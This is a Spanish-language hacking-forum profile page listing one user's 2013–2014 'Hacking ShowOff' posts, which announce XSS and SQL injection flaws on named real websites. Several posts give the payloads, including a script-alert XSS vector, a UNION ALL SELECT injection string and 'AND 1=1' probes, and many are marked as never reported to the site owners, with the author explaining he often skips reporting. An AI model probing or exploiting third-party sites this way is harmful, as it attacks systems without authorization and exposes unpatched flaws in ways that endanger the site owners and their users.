Muy detallada la info 
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#2
Hacking ShowOff / [XSS] financialhearings.com
Mayo 09, 2014, 03:35:49 AM
- URL You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
- Path afectado: Buscador
- Reportado: NOP
- Vector: <script>alert("Pekeinfo");</script> AND [Datum]>11/09/2013 AND [Datum]<11/09/2013&SearchOrder=Newest first (by date)&SearchMax=All&Count=25&SearchWV=FALSE&SearchFuzzy=FALSE
- Url completa: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#3
Underc0de / Re:Reto Oficial #2 - El rey de la Colina - Anotate!
Octubre 02, 2013, 04:57:25 PM
go pues me apunto
me apunto
#4
Hacking ShowOff / Re:[Xss] http://adepi.net
Octubre 02, 2013, 12:01:24 PM
fue muy ajustado pero creo que la publique antes 
#5
Hacking ShowOff / [Xss] http://adepi.net
Octubre 02, 2013, 11:57:37 AM
XSS
Url del sitio: You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login
Vector: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Autor: pekeinfo
Reportado: SI (twitter)
Vector: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Autor: pekeinfo
Reportado: SI (twitter)
#6
Hacking ShowOff / Re:{XSS} http://canasemillas.com
Octubre 01, 2013, 05:18:47 PM
no voy a preguntar que hacías buscando eso 
#7
Hacking ShowOff / Re:[SQLI] http://www.raspipc.es
Octubre 01, 2013, 03:39:04 PM
Hable con el propietario de la web.
Por lo que me comento en el correo el fallo a sido solucionado
Por lo que me comento en el correo el fallo a sido solucionado
#8
Hacking ShowOff / [SQLI] http://www.raspipc.es
Octubre 01, 2013, 10:21:35 AM
SQLi
- Url del sitio: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
- Inyeccion: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login#
- Autor: pekeinfo
- Reportado: SI
#9
Hacking ShowOff / [SQLI ] www.domusartium2002.com
Septiembre 26, 2013, 10:17:27 AM
SQLi
- Url del sitio: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
- Inyeccion: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login#
- Autor: pekeinfo
- Reportado: SI
#10
Hacking ShowOff / [SQLI ] http://ajlopez.net
Septiembre 26, 2013, 06:15:57 AM
SQLi
No se como reportar la falla al administrador del sitio!
- Url del sitio: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
- Inyeccion: Id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT%28version%28%29%29,NULL,NULL,NULL,NULL,NULL,NULL#
- Autor: pekeinfo
- Reportado: NO
No se como reportar la falla al administrador del sitio!
#11
Hacking ShowOff / Re:[SQLi] http://www.saiwireless.com
Septiembre 23, 2013, 08:06:54 PM1) Se lo que es robots.txt, y creo que en este caso si esta mal usado puesto que robost existe para facilitar la función a los buscadores y crawlers, y tal y como lo están usando desde mi punto de vista generan una vulnerabilidad de fuga de información. puesto que no quita los directorios /js/*, /img/* ...etc en su lugar lo que esta haciendo es que un atacante descubra paginas que pueden ser posibles vectores.
2) si no he reportado el fallo es en gran medida a que no quiero
, ¿por que? pues por que la mayoría de los sitios a los que les mando el correo se sienten amenazados o bien pasan de el fallo. Esto me llevo a la conclusión que me cuesta mas esfuerzo reportar el fallo y me trae mas problemas que simplemente no hacerlo. aun así en muchas paginas luego lo reporto dependiendo de a cuanta información se puede tener acceso!3) creo que con el simple hecho de AND 1=1 queda demostrada la injection por lo que tampoco le di mucha importancia, y poner toda la injection me parece un poco mas peligroso para la integridad del sitio afectado puesto que cualquiera con malas intenciones y sin conocimiento puede generar injeciones mas peligrosas. aun así yo pongo la injection :
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Si esto no es lo que hay que poner ruego me disculpen y me corrijan.
Gracias de antemano!
#12
Hacking ShowOff / [SQLi] http://www.saiwireless.com
Septiembre 23, 2013, 05:05:35 PM
SQLi
Url del sitio: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Inyeccion: AND 1=1
Autor: pekeinfo
Reportado: NO
Bueno esto no se si se considera vulnerabilidad o no, yo si lo considero pero bueno ....
en el robots.txt tienen:
User-agent: *
Disallow: /memorias/
Disallow: /desarrollo/
Desarrollo:
creo que solo estara cuando ellos inserten algo :/
memorias:
es un wordpress sin actualizar segun su readme.txt es la Version 2.9.2
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Url del sitio: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Inyeccion: AND 1=1
Autor: pekeinfo
Reportado: NO
Bueno esto no se si se considera vulnerabilidad o no, yo si lo considero pero bueno ....
en el robots.txt tienen:
User-agent: *
Disallow: /memorias/
Disallow: /desarrollo/
Desarrollo:
creo que solo estara cuando ellos inserten algo :/
memorias:
es un wordpress sin actualizar segun su readme.txt es la Version 2.9.2
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#13
Hacking ShowOff / [SQLi][Xss] http://www.futbolinesnacho.es
Septiembre 23, 2013, 04:58:51 PM
XSS
Url del sitio: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector: en el buscador <h1>underc0de</h1>
Autor: pekeinfo
Reportado: NO
SQLi
Url del sitio: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Inyeccion: AND 1=1
Autor: pekeinfo
Reportado: NO
Url del sitio: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector: en el buscador <h1>underc0de</h1>
Autor: pekeinfo
Reportado: NO
SQLi
Url del sitio: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Inyeccion: AND 1=1
Autor: pekeinfo
Reportado: NO
#14
Hacking ShowOff / [SQLi] http://electronica.ugr.es
Septiembre 23, 2013, 04:54:11 PM
SQLi
Url del sitio: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Inyeccion: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login AND 1=1
Autor:pekeinfo
Reportado: NO
Url del sitio: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Inyeccion: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login AND 1=1
Autor:pekeinfo
Reportado: NO
#15
Hacking ShowOff / Re:[SQLI ] http://redfarmaco.org
Septiembre 20, 2013, 12:49:28 PM
Ok gracias por la ayuda.
ahora mismo les mando un mail.
ahora mismo les mando un mail.
#16
Hacking ShowOff / [SQLI ] http://redfarmaco.org
Septiembre 20, 2013, 10:46:55 AM
#17
Hacking ShowOff / [SQLI ] http://www.fguv.org
Septiembre 20, 2013, 07:00:53 AM
#18
Hacking ShowOff / [SQLI ] http://www.culturadelparentesis.com
Septiembre 20, 2013, 06:34:16 AM
#19
Hacking ShowOff / [SQLI ] http://www.travellysimons.com
Septiembre 20, 2013, 06:07:25 AM
#20
Hacking ShowOff / [SQLI ] http://coocv.es
Septiembre 20, 2013, 05:18:13 AMSQLi
Url del sitio: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Inyeccion: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login AND 1=0
Autor: pekeinfo
Reportado: NO
Con motivo del aniversario de la primera sql injection
